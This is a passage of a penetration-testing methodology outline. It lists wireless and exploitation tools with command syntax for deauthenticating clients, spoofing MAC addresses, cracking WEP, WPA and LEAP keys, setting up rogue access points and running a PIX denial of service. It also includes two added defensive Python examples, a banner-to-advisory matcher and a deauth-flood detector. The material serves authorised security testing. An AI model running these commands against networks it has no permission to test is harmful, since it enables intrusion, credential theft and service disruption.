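The banner-grabbing comparison that the Vulnerability Assessment paragraph describes is simple enough to show end to end. This is an added example, not code from the page or from any of the scanners listed: it identifies a product and version from a grabbed banner, compares the version against an advisory table and reports the matches. The banners are constructed, and the advisory table uses placeholder ids (`ADV-EXAMPLE-...`) rather than real CVE numbers; a real scanner would load CVE/NVD data in their place.

```python
import re

# Constructed advisory table: (product, first affected, first fixed, placeholder id).
ADVISORIES = [
    ("openssh", (4, 0), (5, 2), "ADV-EXAMPLE-0001"),
    ("vsftpd", (2, 3, 4), (2, 3, 5), "ADV-EXAMPLE-0002"),
    ("apache", (2, 2, 0), (2, 2, 12), "ADV-EXAMPLE-0003"),
]

# Banner shapes as grabbed from ports 22, 21 and 80.
BANNER_PATTERNS = [
    (re.compile(r"^SSH-2\.0-OpenSSH_([\d.]+)"), "openssh"),
    (re.compile(r"\(vsFTPd ([\d.]+)\)"), "vsftpd"),
    (re.compile(r"Server: Apache/([\d.]+)"), "apache"),
]


def parse_version(text):
    """'5.1p1' -> (5, 1): keep only the leading dotted numeric part."""
    numeric = re.match(r"[\d.]+", text).group(0).strip(".")
    return tuple(int(part) for part in numeric.split("."))


def identify(banner):
    """Return (product, version tuple) or (None, None) for an unrecognised banner."""
    for pattern, product in BANNER_PATTERNS:
        match = pattern.search(banner)
        if match:
            return product, parse_version(match.group(1))
    return None, None


def in_range(version, first_affected, first_fixed):
    """first_affected <= version < first_fixed, padding short tuples with zeros
    so that (5, 2) and (5, 2, 0) compare equal."""
    width = max(len(version), len(first_affected), len(first_fixed))
    pad = lambda v: v + (0,) * (width - len(v))
    return pad(first_affected) <= pad(version) < pad(first_fixed)


def assess(host, port, banner):
    """One finding per banner; 'advisories' is empty when nothing matched."""
    product, version = identify(banner)
    finding = {"host": host, "port": port, "product": product,
               "version": version, "advisories": []}
    if product is None:
        finding["note"] = "unrecognised banner; verify manually"
        return finding
    for prod, first, fixed, advisory in ADVISORIES:
        if prod == product and in_range(version, first, fixed):
            finding["advisories"].append(advisory)
    return finding


# Constructed banners, as a scanner would have collected them.
SAMPLE_BANNERS = [
    ("192.0.2.10", 22, "SSH-2.0-OpenSSH_5.1p1 Debian-5"),
    ("192.0.2.10", 21, "220 (vsFTPd 2.3.5)"),
    ("192.0.2.11", 80, "HTTP/1.1 200 OK\r\nServer: Apache/2.2.11 (Unix)\r\n"),
    ("192.0.2.12", 25, "220 mail ESMTP ready"),
]


def run_assessment(banners=SAMPLE_BANNERS):
    return [assess(host, port, banner) for host, port, banner in banners]


if __name__ == "__main__":
    for finding in run_assessment():
        print(finding)
```

A match from this logic is only a version-string match: distributions backport fixes without changing the advertised version, so every finding still needs the verification step the paragraph above calls for before it is reported as confirmed.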
- Resources
- Security Focus, Microsoft Security Bulletin, Common Vulnerabilities and Exploits (CVE), National Vulnerability Database (NVD), The Open Source Vulnerability Database (OSVDB)
- Standalone Database
- Update URL
- United States Computer Emergency Response Team (US-CERT), Computer Emergency Response Team, Mozilla Security Information, SANS, Securiteam, PacketStorm Security, Security Tracker, Secunia, Vulnerabilities.org, ntbugtraq, Wireless Vulnerabilities and Exploits (WVE)
- Blogs
- Carnal0wnage, Fsecure Blog, g0ne blog, GNUCitizen, ha.ckers Blog, Jeremiah Grossman Blog, Metasploit, nCircle Blogs, pentestmonkey.net, Rational Security, Rise Security, Security Fix Blog, Software Vulnerability Exploitation Blog, Taosecurity Blog
- Wireless Penetration
- Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry the assessment out.
- Site Map
- RF Map
- Lines of Sight, Signal Coverage
- Standard Antenna, Directional Antenna
- Physical Map
- Triangulate APs, Satellite Imagery
- Network Map
- MAC Filter
- Authorised MAC Addresses Reaction to Spoofed MAC Addresses
- Encryption Keys utilised
- WEP
- Key Length
- Crack Time Key
- WPA/PSK
- TKIP
- Temporal Key Integrity Protocol, (TKIP), is an encryption protocol designed to replace WEP
- Key Attack Time
- AES
- Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data.
- Key Attack Time
- 802.1x
- Derivative of 802.1x in use
- Access Points
- ESSID
- Extended Service Set Identifier, (ESSID). Utilised on wireless networks with an access point
- Broadcast ESSIDs
- BSSIDs
- Basic service set identifier, (BSSID), utilised on ad-hoc wireless networks.
- Vendor, Channel, Associations, Rogue AP Activity
- Wireless Clients
- MAC Addresses
- Vendor, Operating System Details, Adhoc Mode, Associations
- Intercepted Traffic
- Encrypted, Clear Text
- Wireless Toolkit
- Wireless Discovery
- Aerosol, Airfart, Aphopper, Apradar, BAFFLE, karma, Kismet, MiniStumbler, Netstumbler, Wellenreiter, Wifi Hopper, WirelessMon
- Packet Capture
- Airopeek, Airtraf, Apsniff, Cain, Wireshark
- EAP Attack tools
- eapmd5pass
- eapmd5pass -w dictionary_file -r eapmd5-capture.dump
- eapmd5pass -w dictionary_file -U username -C EAP-MD5_challenge_value -R EAP-MD5_response_value -E EAP-MD5_response_EAP_ID_value, i.e. -C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2
- Leap Attack Tools
- asleap, thc leap cracker, anwrap
- WEP/ WPA Password Attack Tools
- Aircrack-ptw, Aircrack-ng, Airsnort, cowpatty, wep attack, wep crack, Airbase, wzcook
- Frame Generation Software
- Airgobbler, airpwn, Airsnarf, Commview, fake ap, void 11, wifi tap
- wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p]] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
- FreeRADIUS - Wireless Pwnage Edition
- Mapping Software
- Knsgem
- File Format Conversion Tools
- ns1 recovery and conversion tool, warbable, warkizniz
- warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
- ivstools
- IDS Tools
- WIDZ, War Scanner, Snort-Wireless, AirDefense, AirMagnet
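The wireless IDS products listed above watch the same management frames that the deauthentication steps later in this section rely on, and the first check they all perform is a deauth/disassoc rate threshold. The following is an added example, not code from the page or from any of those products: an 802.11 management-frame parser and a windowed counter that raises one alert per (source, BSSID) pair exceeding a threshold. The capture is constructed in memory; with a monitor-mode capture the same `parse_frame` would run on each frame's 802.11 header after the radiotap header is stripped. The MAC addresses, window and threshold are made-up sample values.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH, DISASSOC = (0, 12), (0, 10)      # (type, subtype) of management frames


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_mgmt_frame(subtype, dst, src, bssid, seq, reason=7):
    """Constructed 802.11 management frame: frame control, duration, addr1-3,
    sequence control and (for deauth/disassoc) a little-endian reason code."""
    frame_control = bytes([(subtype << 4) | (0 << 2) | 0, 0])   # type 0, version 0
    body = struct.pack("<H", reason) if (0, subtype) in (DEAUTH, DISASSOC) else b""
    return (frame_control + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src)
            + mac_bytes(bssid) + struct.pack("<H", seq << 4) + body)


def parse_frame(frame):
    """Decode the header fields needed for detection."""
    fc0 = frame[0]
    info = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": fc0 >> 4,
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "seq": struct.unpack("<H", frame[22:24])[0] >> 4,
    }
    if (info["type"], info["subtype"]) in (DEAUTH, DISASSOC):
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info


def detect_deauth_flood(capture, window=1.0, threshold=5):
    """capture: iterable of (timestamp_seconds, raw_frame).  Raise one alert per
    (source, BSSID) that sends more than `threshold` deauth/disassoc frames
    inside any `window`-second span; a single frame is normal behaviour."""
    recent = defaultdict(list)
    alerted, alerts = set(), []
    for ts, raw in capture:
        f = parse_frame(raw)
        if (f["type"], f["subtype"]) not in (DEAUTH, DISASSOC):
            continue
        key = (f["src"], f["bssid"])
        times = [t for t in recent[key] if ts - t <= window] + [ts]
        recent[key] = times
        if len(times) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": f["src"], "bssid": f["bssid"], "count": len(times),
                           "broadcast": f["dst"] == BROADCAST, "reason": f["reason"],
                           "first": times[0], "last": ts})
    return alerts


AP, STA = "00:11:22:33:44:55", "66:77:88:99:aa:bb"   # constructed addresses

# Constructed capture: one legitimate deauth (reason 3, station leaving), then
# 20 broadcast deauths in 0.4 s claiming to come from the AP, then a beacon
# (subtype 8) that the detector must ignore.
SAMPLE_CAPTURE = (
    [(0.0, build_mgmt_frame(12, AP, STA, AP, 100, reason=3))]
    + [(1.0 + i * 0.02, build_mgmt_frame(12, BROADCAST, AP, AP, 200 + i)) for i in range(20)]
    + [(2.0, build_mgmt_frame(8, BROADCAST, AP, AP, 300))]
)

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_CAPTURE):
        print(alert)
```

Broadcast deauths with a high rate and an unchanging reason code are the pattern to alert on; a single deauth from a station to its AP is ordinary roaming and should not page anyone.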
- WLAN discovery
- Unencrypted WLAN
- Visible SSID
- Sniff for IP range
- MAC authorised, MAC filtering
- Spoof valid MAC
- Linux
- ifconfig [interface] hw ether [MAC]
- macchanger
- Random Mac Address:- macchanger -r eth0
- mac address changer for windows, madmacs, TMAC, SMAC
- Hidden SSID
- Deauth client
- Aireplay-ng
- aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
- Commview
- Tools > Node reassociation
- Void11
- void11_penetration wlan0 -D -t 1 -B [MAC]
- WEP encrypted WLAN
- Visible SSID
- WEPattack
- wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]
- Capture / Inject packets
- Break WEP
- Aircrack-ptw
- aircrack-ptw [pcap file]
- Aircrack-ng
- aircrack -q -n [WEP key length] -b [BSSID] [pcap file]
- Airsnort
- Channel > Start
- WEPcrack
- perl WEPCrack.pl
- ./pcap-getIV.pl -b 13 -i wlan0
- Hidden SSID
- Deauth client
- Aireplay-ng
- aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
- Commview
- Tools > Node reassociation
- Void11
- void11_hopper
- void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]
- WPA / WPA2 encrypted WLAN
- Deauth client
- Capture EAPOL handshake
- WPA / WPA 2 dictionary attack
- coWPAtty
- ./cowpatty -r [pcap file] -f [wordlist] -s [SSID]
- ./genpmk -f dictionary_file -d hashfile_name -s ssid
- ./cowpatty -r capture_file.cap -d hashfile_name -s ssid
- Aircrack-ng
- aircrack-ng -a 2 -w [wordlist] [pcap file]
- LEAP encrypted WLAN
- Deauth client
- Break LEAP
- asleap
- ./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash_file.dat -n output_index_filename.idx
- ./genkeys -r dictionary_file -f output_pass+hash_file.dat -n output_index_filename.idx
- THC-LEAPcracker
- leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge]
- 802.1x WLAN
- Create Rogue Access Point
- Airsnarf
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
- fake ap
- perl fakeap.pl --interface wlan0
- perl fakeap.pl --interface wlan0 --channel 11 --essid fake_name --wep 1 --key [WEP KEY]
- Hotspotter
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
- Karma
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
- ./bin/karma etc/karma-lan.xml
- Linux rogue AP
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
- Resources
- URLs
- Wirelessdefence.org, Russix, Wardrive.net, Wireless Vulnerabilities and Exploits (WVE)
- White Papers
- Weaknesses in the Key Scheduling Algorithm of RC4; 802.11b Firmware-Level Attacks; Wireless Attacks from an Intrusion Detection Perspective; Implementing a Secure Wireless Network for a Windows Environment; Breaking 104 bit WEP in less than 60 seconds; PEAP Shmoocon2008 Wright & Antoniewicz; Active behavioral fingerprinting of wireless devices
- Common Vulnerabilities and Exploits (CVE)
- Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
- Penetration
- Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are, at their most basic, pre-compiled point and shoot tools. These engines also have a number of extra underlying features for more advanced users.
- Password Attacks
- Known Accounts
- Identified Passwords, Unidentified Hashes
- Default Accounts
- Identified Passwords, Unidentified Hashes
- Exploits
- Successful Exploits
- Accounts
- Passwords
- Cracked, Uncracked
- Groups, Other Details
- Services, Backdoor Connectivity
- Unsuccessful Exploits
- Resources
- Securiteam
- Exploits are sorted by year and must be downloaded individually
- SecurityForest
- Updated via CVS after initial install
- GovernmentSecurity
- Need to create an account to obtain access
- Red Base Security
- Oracle Exploit site only
- Wireless Vulnerabilities & Exploits (WVE)
- Wireless Exploit Site
- PacketStorm Security
- Exploits downloadable by month and year but no indexing carried out.
- SecWatch
- Exploits sorted by year and month, download separately
- SecurityFocus
- Exploits must be downloaded individually
- Metasploit
- Install and regularly update via svn
- Milw0rm
- Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!
- Tools
- Metasploit
- Free Extra Modules
- local copy
- Manual SQL Injection
- Understanding SQL Injection; SQL Injection walkthrough; SQL Injection by example; Blind SQL Injection; Advanced SQL Injection in SQL Server; More Advanced SQL Injection; Advanced SQL Injection in Oracle databases; SQL Cheatsheets
- SQL Power Injector, SecurityForest, SPI Dynamics WebInspect, Core Impact, Cisco Global Exploiter, PIXDos
- perl PIXdos.pl [--device=interface] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
- CANVAS
- Inguma